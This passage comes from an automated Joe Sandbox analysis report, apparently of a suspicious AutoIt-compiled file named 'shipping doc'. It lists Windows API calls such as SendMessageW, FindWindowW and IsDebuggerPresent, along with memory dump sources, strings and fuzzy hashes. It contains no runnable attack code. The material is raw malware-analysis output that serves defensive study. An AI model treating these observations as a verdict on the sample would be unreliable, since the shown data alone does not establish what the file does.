                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 00143CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00143CCA
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00141C46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: d563a710821470bc7eb66db5369783bbf3f772c6712a2bd55c65b015b5adb85a
                                                                                              • Instruction ID: 8c4e5807b624bd43df536fffc808837527919229cb9271271f0252480c0aff07
                                                                                              • Opcode Fuzzy Hash: d563a710821470bc7eb66db5369783bbf3f772c6712a2bd55c65b015b5adb85a
                                                                                              • Instruction Fuzzy Hash: 3201A7756811187ACB18FB90CE92AFF77A99B12340F540019B816772A2EB209F4986B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 00143CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00143CCA
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00141CC8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 4393375b4eb3e09fac7fea0a65c9a1af4ee34a98c9c627d5d80e53da55bdacd0
                                                                                              • Instruction ID: d37a26b13d1e37908b170105a716cb5a8162bb6246c88f96c067bacacb24b143
                                                                                              • Opcode Fuzzy Hash: 4393375b4eb3e09fac7fea0a65c9a1af4ee34a98c9c627d5d80e53da55bdacd0
                                                                                              • Instruction Fuzzy Hash: DD01D6756801187BCB18FBA1CF82AFE73A99B12340F940019B802732A2FB209F49C671
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 00143CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00143CCA
                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00141DD3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 91f9cb778600f997d20ca38585be6a895075e5d9c033a08568472b304f4cc6e5
                                                                                              • Instruction ID: 52f62fcd41ec1b44d9277fb8753e158488f54838ca5996a39f63d43b8e5f195e
                                                                                              • Opcode Fuzzy Hash: 91f9cb778600f997d20ca38585be6a895075e5d9c033a08568472b304f4cc6e5
                                                                                              • Instruction Fuzzy Hash: 43F0F4B1F402147ACB18F7E4CD96BFE7378AB02350F440919B822732E2EB6059498260
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: 3, 3, 16, 1
                                                                                              • API String ID: 176396367-3042988571
                                                                                              • Opcode ID: 12799d00d44bea2b7ccf1a25b953104a0a93bf1bd0485bfc04773a632b23585c
                                                                                              • Instruction ID: 79023715ef9816ad4ab8df994eccac8c6915fd174bf568286be95eafd1e644c7
                                                                                              • Opcode Fuzzy Hash: 12799d00d44bea2b7ccf1a25b953104a0a93bf1bd0485bfc04773a632b23585c
                                                                                              • Instruction Fuzzy Hash: 07E02B5620532011D2311279ACC5A7F5689DFDDB54710183BFEC1C22E6EFD48DA193A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00140B23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 2030045667-4017498283
                                                                                              • Opcode ID: 3bf1f0626d2afddfef5e7939bc6d5f8e0e96ddb7c2898e4be3b619cee7b16419
                                                                                              • Instruction ID: 4e5f3bbce9a0ea78679e47fe5db3e38cecea840392807dc1a54cf3454d31a7d4
                                                                                              • Opcode Fuzzy Hash: 3bf1f0626d2afddfef5e7939bc6d5f8e0e96ddb7c2898e4be3b619cee7b16419
                                                                                              • Instruction Fuzzy Hash: C4E0DF322883082AD2143695BC43FD97A958F09B64F10446EFB8CA98C38BE2249056E9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00100D71,?,?,?,000E100A), ref: 000FF7CE
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,000E100A), ref: 00100D75
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000E100A), ref: 00100D84
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00100D7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 55579361-631824599
                                                                                              • Opcode ID: ce537ae12d87d961c8cb185cfd9b9fa8fb3841abe782b8b81cda3f81b7c85cc2
                                                                                              • Instruction ID: f216a7e9ce37f479468b08b5060bca89717c0f654769497746f8c0868824aba3
                                                                                              • Opcode Fuzzy Hash: ce537ae12d87d961c8cb185cfd9b9fa8fb3841abe782b8b81cda3f81b7c85cc2
                                                                                              • Instruction Fuzzy Hash: BCE06D742007418BD3219FB8E808352BBF1AF04740F01892DE48AC6A92EBF4E5C48BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: %.3d$X64
                                                                                              • API String ID: 481472006-1077770165
                                                                                              • Opcode ID: 0fc34c88ac90119f66e02a1a82a20c70f6e21c5a2e3894c205048d3b5136b338
                                                                                              • Instruction ID: be72c51833ef686890e67c7026ab32ba404e2a707b22bf942c778fd5aa2c2210
                                                                                              • Opcode Fuzzy Hash: 0fc34c88ac90119f66e02a1a82a20c70f6e21c5a2e3894c205048d3b5136b338
                                                                                              • Instruction Fuzzy Hash: 80D01261808109E9CB9496D0FC459BBB37CBF18341F618452F906E1041D734C6486761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0017232C
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0017233F
                                                                                                • Part of subcall function 0014E97B: Sleep.KERNEL32 ref: 0014E9F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 551935edff3857cc432be1211c13241921c6d07121258918d6cf044c085b2bd4
                                                                                              • Instruction ID: 67a1faeaccc1b1d256f9d6cf7d0c1597fd76939abc2fb7bf261ed372cc6fbf13
                                                                                              • Opcode Fuzzy Hash: 551935edff3857cc432be1211c13241921c6d07121258918d6cf044c085b2bd4
                                                                                              • Instruction Fuzzy Hash: D6D012363D4310B7E664B770DC4FFC67A64AB14B14F00491AB749AA1E0CAF0A881CE94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0017236C
                                                                                              • PostMessageW.USER32(00000000), ref: 00172373
                                                                                                • Part of subcall function 0014E97B: Sleep.KERNEL32 ref: 0014E9F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: ed69845abe573ef3241f9611977dd4cfc410a1baf6299686c88f2c589fac1428
                                                                                              • Instruction ID: 6d5eecc9faae58654c066db7e41ff0a854b607cf2f043f673f414a994ea3f63e
                                                                                              • Opcode Fuzzy Hash: ed69845abe573ef3241f9611977dd4cfc410a1baf6299686c88f2c589fac1428
                                                                                              • Instruction Fuzzy Hash: 4AD012363D1310BBE664B770DC4FFC67664AB15B14F00491AB749EA1E0CAF0B881CE94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0011BE93
                                                                                              • GetLastError.KERNEL32 ref: 0011BEA1
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0011BEFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: 37c4b5463764080bc1c39c80f408ef837b057e4adbccf036af06f2eab0a60a69
                                                                                              • Instruction ID: 2941d538eae3954aaac284f6c033012741090db0a192bd1f7d0c5e30cfd5907c
                                                                                              • Opcode Fuzzy Hash: 37c4b5463764080bc1c39c80f408ef837b057e4adbccf036af06f2eab0a60a69
                                                                                              • Instruction Fuzzy Hash: 8741D434609207AFCF299F64CCC4AFA7BA5AF41320F254179F9599B1E1DB308D82CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%